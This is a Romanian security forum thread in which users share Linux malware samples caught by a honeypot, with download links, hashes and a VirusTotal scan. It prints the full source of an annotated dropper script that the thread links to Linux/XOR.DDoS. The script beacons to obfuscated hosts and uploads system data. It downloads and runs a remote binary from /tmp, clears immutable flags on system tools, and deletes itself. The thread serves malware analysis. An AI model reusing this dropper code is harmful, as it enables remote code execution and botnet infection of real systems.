malsploit Posted October 24, 2014 Report Posted October 24, 2014 (edited)
Am setat un honeypot si am reusit sa prind cateva chestii. Daca aveti chef si timp, uitati-va si voi peste ele.
https://mega.co.nz/#F!7pkTXIwA!CEUuPjIZ5tZMEPo6mzbuaw
2789524badd154ba54197b90644bd3fc 3502.rar
a984d8d0a5b39e96beb42ee137736e5c 3502_s.rar
edf1a95c76faa1e304d31ddc633660f8 3503.rar
9dae3c2cd7fd4e8f8215a34302009bd9 java555.rar
aa58641c1f6827c0bc751b948ea85eef java666.rar
3502.rar: POSIX shell script, ASCII text executable
3502_s.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
3503.rar: POSIX shell script, ASCII text executable
java555.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
java666.rar: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Edited October 24, 2014 by hate.me Quote
blech Posted November 5, 2014 Report Posted November 5, 2014
@hate.me
am scanat de curiozitate 2 dintre fisiere online:
3502_s.sh
https://www.virustotal.com/en/file/50bf4092721fd8e2127e8602ee83edad37d2ec6650aa4f808792b36a941a79b7/analysis/1415195145/
daca il deschid cu un notepad++ vad foarte multe caractere aiurea pe care nu le pot interpreta, dar se mai vad si stringuri in cleartext:
%s: cannot create file: %s %s: cannot map file: %s %s: cannot stat file: %s %s: file is no correct profile data file for `%s' Out of memory while initializing profiler invalid mode for dlopen() cannot extend global scope cannot create scope list no more namespaces available for dlmopen() invalid target namespace in dlmopen() empty dynamic string token substitution opening file=%s [%lu]; direct_opencount=%u TLS generation counter wrapped! Please report this. closing file=%s; direct_opencount=%ufile=%s [%lu]; destroying link map TLS generation counter wrapped! Please report as described in <http://www.gnu.org/software/libc/bugs.html>.calling fini: %s [%lu]sau empty dynamics string token substitution load auxiliary object=%s requested by file=%s load filtered object=%s requested by file=%s cannot allocate dependency list cannot allocate symbol search list Filters not supported with LD_TRACE_PRELINKING calling init: %scalling preinit: %s checking for version `%s' in file %s [%lu] required by file %s [%lu] no version information available (required by cannot allocate version reference table unsupported version of Verdef record weak version ` ' not found (required by of Verneed record RTLD_NEXT used in code not dynamically loaded –æýÿãæýÿÂæýÿ–$þÿü#þÿì#þÿÜ#þÿÿ"þÿÿ"þÿÿ"þÿÿ"þÿ€#þÿr#þÿ9#þÿe#þÿ*** stack smashing detected ***: %s terminated
iar al doilea fisier 3503.sh
(rar)
#!/bin/sh
# Dropper script as captured by the honeypot (posted above as 3503.sh / 3503.rar).
# Overall flow (see main at the bottom): decode the configuration strings below,
# fingerprint the running kernel, pick a staging host, obtain a build archive for
# this kernel, run the `bin` it contains, fall back to a direct binary download
# if anything fails, then clean up and delete this script.
# Reviewer annotations only: the code itself is reproduced exactly as posted.
#
# Configuration. Every value below except __password__, __temp__, __install_dir__
# and __kernel__ is stored in a tr-substituted form (see enc/dec further down) and
# is decoded in place at the top of main(); the encoded values are left as-is here.
__host_32__="sEEA+==deadefadcajc"
__host_64__="sEEA+==deadefadcaih"
__host_32_2__="sEEA+==cbeadgakaddh"
__host_64_2__="sEEA+==cbeadgakaddg"
__host_32_libc__="sEEA+==cbeadgakaddh"
__host_64_libc__="sEEA+==cbeadgakaddg"
# Fallback payload location used by download_and_execute().
__download_url__="sEEA+==deadefadcajd=FAwzlo=egbe"
# `|`-separated list; after decoding it is sent as the `ip=` query parameter by
# compiler() and upload().
__remote__="cbeadgakadfg+egbe|cbeadfbacfcagb+egbe|hhacbdadgeaeb+egbe|yoyDaoDludlcazCr+egbe|yoyDaoDludlazCr+egbe|yoyDasnItlzlzanzx+egbe|yoyDaoDludlanzx+egbe"
# __username__ is passed through dec() in main(); __password__ is used verbatim.
__username__='loxty'
__password__='admin'
__temp__=/tmp
# Assigned but never referenced anywhere else in this script.
__install_dir__=/usr/local/bin
# `uname -r` with everything from the first `-` onward dropped.
__kernel__=`uname -r|awk -F- '{print $1}'`
# select compiler server
# Chooses the staging host and stores it in the global __host__:
#  - __osv_X86_64 / __osv_AMD64 are decoded tokens grepped for in `uname -a`;
#    a match selects the *_64 hosts, otherwise the *_32 hosts are used.
#  - __libc_main / __libc_sub are the X and Y of the "libc-X.Y" name shown by
#    `ls -la /lib/libc.so.6`; a libc of 2.5 or lower overrides the choice with
#    the *_libc host.
#  - A probe GET to <host>/check (iid + kernel, 3 s timeout, 1 try) decides
#    between the primary host (non-empty reply) and the *_2 fallback.
# Reads the globals __iid and __kernel__, which main() sets before calling.
# If no "libc-" name is found, __libc_main/__libc_sub stay empty and the numeric
# tests below fail with a test-syntax error, which just makes that `if` false
# (the script never enables set -e).
# NOTE(review): the lone `#` after several `then`s below is reproduced from the
# pasted copy; if the original comment ran to the end of its line it would have
# swallowed the following statement — confirm against the raw sample.
server(){
  __osv_X86_64=`dec 'Ijh_hf'`
  __osv_AMD64=`dec 'LXOhf'`
  __os_version_X86_64=`uname -a|grep "$__osv_X86_64"`
  __os_version_AMD64=`uname -a|grep "$__osv_AMD64"`
  if [ -f /lib/libc.so.6 ]; then
    __libc_main=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $1}'`
    __libc_sub=`ls -la /lib/libc.so.6 | grep libc-|awk -F'libc-' '{print $2}'|awk -F'.' '{print $2}'`
  fi
  if [ ! -z "$__os_version_X86_64" -o ! -z "$__os_version_AMD64" ] ;then
    __online=`wget "$__host_64__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
    if [ ! -z "$__online" ]; then #
      __host__=$__host_64__
    else
      __host__=$__host_64_2__
    fi
    if [ -f /lib/libc.so.6 ]; then
      if [ $__libc_main -le 2 ]; then
        if [ $__libc_sub -le 5 ]; then
          __host__=$__host_64_libc__
        fi
      fi
    fi
  else
    __online=`wget "$__host_32__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 1 -q -O -`
    if [ ! -z "$__online" ]; then #
      __host__=$__host_32__
    else
      __host__=$__host_32_2__
    fi
    if [ -f /lib/libc.so.6 ]; then
      if [ $__libc_main -le 2 ]; then
        if [ $__libc_sub -le 5 ]; then
          __host__=$__host_32_libc__
        fi
      fi
    fi
  fi
}
# check md5
# Prints the lowercase hex MD5 of its arguments joined by single spaces (echo -n,
# so no trailing newline is hashed). Always returns 0.
md5(){
  __data=`echo "$@"`
  echo -n "$__data"|md5sum|cut -d ' ' -f1
  return 0
}
# get os version
# When /sbin/modinfo exists, prints the `vermagic` value of the last module
# listed by lsmod, with leading spaces removed and remaining spaces
# backslash-escaped; prints nothing otherwise. Always returns 0.
# main() hashes this output to derive __iid.
version(){
  if [ -f /sbin/modinfo ]; then
    SYS=`/sbin/lsmod |tail -n 1 | awk ' {print $1} '`
    echo "`/sbin/modinfo $SYS|grep vermagic|awk -F: '{print $2}'|sed 's/^ *//g'|awk '{print $0}'|sed 's/ /\\\\ /g'`"
  fi
  return 0
}
# Returns 1 when /lib/modules/<uname -r>/build/ exists, else 0, and sets the
# global __build that generate() reads.
# Note the inverted convention used by every helper in this script: 1 = success.
checkBuild(){
  __build=/lib/modules/`uname -r`/build/
  if [ -d $__build ]; then
    return 1
  fi
  return 0
}
# generate header file
# Packs the contents of __build (the kernel build/headers tree found by
# checkBuild) into $__temp__/dev.tgz, following symlinks (h) and keeping
# absolute paths (P). Returns 1 if tar succeeded, else 0.
generate(){
  __files=`ls $__build`
  tar zcfhP "$__temp__/dev.tgz" -C $__build $__files
  if [ $? -eq 0 ] ;then
    return 1
  fi
  return 0
}
# check header version
# GET $__host__/check?iid=<iid>&kernel=<kernel>. The reply is split on `|` into
# code and md5; returns 1 when code is 1001, else 0. __md5 is captured but not
# used afterwards. Presumably 1001 means the host already knows this iid —
# main() then skips the header upload and goes straight to compiler().
check(){
  __iid=`echo "$@"`
  if [ ! -z "$__iid" ]; then
    __result=`wget "$__host__/check?iid=$__iid&kernel=$__kernel__" --connect-timeout=3 -t 3 -O - -q`
    if [ ! -z "$__result" ]; then
      __code=`echo $__result|awk -F "|" '{print $1}'`
      __md5=`echo $__result|awk -F "|" '{print $2}'`
      if [ $__code -eq 1001 ]; then
        return 1
      fi
    fi
  fi
  return 0
}
# download build file
# Fetches $__host__/upload/module/<iid>/build.tgz into /tmp/build.tgz (a
# hard-coded /tmp, not $__temp__). Returns 1 if wget succeeded, else 0.
download(){
  __iid=`echo "$@"`
  if [ ! -z "$__iid" ]; then
    __url="$__host__/upload/module/$__iid/build.tgz"
    wget "$__url" -O /tmp/build.tgz -q --connect-timeout=3 -t 3
    if [ $? -eq 0 ];then #
      return 1
    fi
  fi
  return 0
}
# Fallback used by main() when the build flow did not complete: fetches
# __download_url__ to /tmp/bin, makes it executable, runs it in the foreground,
# waits 3 s and deletes it. Returns 1 if the download succeeded, else 0.
# Observable for responders: a short-lived executable at /tmp/bin.
download_and_execute(){
  wget "$__download_url__" -O /tmp/bin -q --connect-timeout=3 -t 3
  if [ $? -eq 0 ];then #
    chmod +x /tmp/bin
    /tmp/bin
    sleep 3
    rm -rf /tmp/bin
    return 1
  fi
  return 0
}
# remote compiler code
# Requests a remote build: GET $__host__/compiler with the iid, username,
# password, the decoded __remote__ list (ip=), the vermagic string (ver=) and the
# kernel in the query string — all of which therefore appear in wget's argv.
# Reply split on `|` into code and md5; returns 1 when code is 1001, else 0.
compiler(){
  __iid=`echo "$@"`
  if [ ! -z "$__iid" ]; then
    __url="$__host__/compiler?iid=$__iid&username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__"
    __result=`wget "$__url" -O - -q --connect-timeout=3 -t 3`
    if [ ! -z "$__result" ]; then
      __code=`echo $__result|awk -F "|" '{print $1}'`
      __md5=`echo $__result|awk -F "|" '{print $2}'`
      if [ $__code -eq 1001 ]; then
        return 1
      fi
    fi
  fi
  return 0
}
# uncompress file
# Extracts $__temp__/build.tgz into $__temp__/<iid>/ (created if missing) and,
# on success, destroys the archive with `shred -u -z`. Returns 1 on success.
uncompress(){
  __iid=`echo "$@"`
  if [ ! -z "$__iid" ]; then
    if [ ! -d $__temp__/$__iid ]; then
      mkdir $__temp__/$__iid
    fi
    tar zxvf $__temp__/build.tgz -C $__temp__/$__iid
    if [ $? -eq 0 ] ;then
      shred -u -z $__temp__/build.tgz
      return 1
    fi
  fi
  return 0
}
# enc/dec: character-substitution (tr) obfuscation for the configuration
# strings; dec applies the reverse mapping and is what main() uses. Arguments
# are echoed unquoted, so they undergo word splitting and globbing first.
enc(){ echo $@|tr "[.0-9a-zA-Z\/\/\:]" "[a-zA-Z0-9\;-=+*\/]"; }
dec(){ echo $@|tr "[a-zA-Z0-9\;-=+*\/]" "[.0-9a-zA-Z\/\/\:]"; }
# install file
# Runs the extracted $__temp__/<iid>/bin after chmod +x; if it exits 0, waits
# 3 s, removes the binary and returns 1. Returns 0 otherwise.
setup(){
  __iid=`echo "$@"`
  if [ ! -z "$__iid" ]; then
    __bin=`echo "bin"`
    chmod +x $__temp__/$__iid/$__bin
    $__temp__/$__iid/$__bin
    if [ $? -eq 0 ]; then
      sleep 3
      rm -rf $__temp__/$__iid/$__bin
      return 1
    fi
  fi
  return 0
}
# upload
# Downloads a helper named `mini` from $__host__/upload/mini into /tmp/mini and
# uses it to POST the credentials, host list, vermagic, kernel and the dev.tgz
# archive (file=@...) to $__host__/submit. Reply split on `|`; returns 1 when
# code is 1001, else 0. /tmp/mini is removed before exiting either way.
upload(){
  rm -f /tmp/mini
  wget $__host__/upload/mini -O /tmp/mini -q --connect-timeout=3 -t 3
  if [ $? -eq 0 ];then #
    chmod +x /tmp/mini
    __url=$__host__/submit
    __result=`/tmp/mini --url="$__url" --post="username=$__username__&password=$__password__&ip=$__remote__&ver=$__version__&kernel=$__kernel__&file=@$__temp__/dev.tgz"`
    if [ ! -z "$__result" ]; then
      __code=`echo $__result|awk -F "|" '{print $1}'`
      __md5=`echo $__result|awk -F "|" '{print $2}'`
      if [ $__code -eq 1001 ]; then
        rm -f /tmp/mini
        return 1
      fi
    fi
    rm -f /tmp/mini
  fi
  return 0
}
# main entry
# 1. Extends PATH and decodes the configuration strings in place.
# 2. __iid = upper-cased MD5 of the vermagic string returned by version().
# 3. Ensures /tmp exists, then clears the immutable attribute (chattr -i) and
#    re-adds +x on wget and cut in /usr/bin and /bin so the helpers above can
#    run — these chattr calls are a good detection point.
# 4. server -> check -> compiler, or checkBuild -> generate -> upload -> compiler
#    depending on what the host answers; every helper returns 1 on success.
# 5. On success: download -> uncompress -> setup. If any stage failed (__done=0)
#    falls back to download_and_execute.
# 6. Removes $__temp__/<iid> and deletes this script itself (rm -f $0).
main(){
  PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
  __host_32__=`dec "$__host_32__"`
  __host_64__=`dec "$__host_64__"`
  __host_32_2__=`dec "$__host_32_2__"`
  __host_64_2__=`dec "$__host_64_2__"`
  __host_32_libc__=`dec "$__host_32_libc__"`
  __host_64_libc__=`dec "$__host_64_libc__"`
  __download_url__=`dec "$__download_url__"`
  __remote__=`dec "$__remote__"`
  __username__=`dec "$__username__"`
  __version__=`version`
  __iid=`md5 "$__version__"`
  # [:lower:] / [:upper:] are unquoted, so they are also subject to globbing.
  __iid=`echo $__iid|tr [:lower:] [:upper:]`
  __done=0
  if [ ! -d /tmp ]; then
    mkdir /tmp
  fi
  if [ -f /usr/bin/wget ]; then
    chattr -i /usr/bin/wget
    chmod +x /usr/bin/wget
  fi
  if [ -f /bin/wget ]; then
    chattr -i /bin/wget
    chmod +x /bin/wget
  fi
  if [ -f /usr/bin/cut ]; then
    chattr -i /usr/bin/cut
    chmod +x /usr/bin/cut
  fi
  if [ -f /bin/cut ]; then
    chattr -i /bin/cut
    chmod +x /bin/cut
  fi
  server # select http server
  check $__iid
  if [ $? -eq 1 ];then
    compiler $__iid # remote compiler
    if [ $? -eq 1 ]; then
      __done=1
    fi
  else
    checkBuild
    if [ $? -eq 1 ];then
      generate # create header file
      if [ $? -eq 1 ]; then
        upload
        if [ $? -eq 1 ] ;then
          __done=1
        fi
        rm -rf $__temp__/dev.tgz
      else
        if [ -f $__temp__/dev.tgz ]; then
          rm -rf $__temp__/dev.tgz
        fi
        compiler $__iid # remote compiler
        if [ $? -eq 1 ]; then
          __done=1
        fi
      fi
    else
      compiler $__iid # remote compiler
      if [ $? -eq 1 ]; then
        __done=1
      fi
    fi
  fi
  if [ $__done -eq 1 ]; then
    download $__iid
    if [ $? -eq 1 ]; then
      uncompress $__iid
      if [ $? -eq 1 ]; then
        setup $__iid
        if [ $? -ne 1 ]; then
          __done=0
        fi
      else
        __done=0
      fi
    else
      __done=0
    fi
  fi
  if [ $__done -eq 0 ]; then
    download_and_execute
  fi
  rm -rf $__temp__/$__iid
  rm -f $0
}
main
# The script's exit status is that of this ls, i.e. whether /var/run/sftp.pid
# exists after the run (presumably created by the executed payload — not
# determinable from this script alone).
ls -la /var/run/sftp.pid
exit $?
care se pricepe sa interpreteze codul... go for it! Quote
malsploit Posted November 5, 2014 Author Report Posted November 5, 2014 Malware Must Die!: MMD-0028-2014 - Fuzzy reversing a new China ELF "Linux/XOR.DDoS" Quote
malsploit Posted March 21, 2015 Author Report Posted March 21, 2015
https://mega.co.nz/#!Sl10XY5I!kx8AqbKjY8DB5Vyr0NE0qZDpPWVgp3a40D3xs2Zjp-o
https://mega.co.nz/#!b9VAnCRQ!rwjkhbw76a5hnDwTepkanV0zlidmeNFOF0LoAnfAaQU
txmas: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, stripped
txmss: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
ec8ff2f6226f7085059466164f71976c txmas
d26b6ffee5d75b3c63c2e080f4bc735f txmss
Quote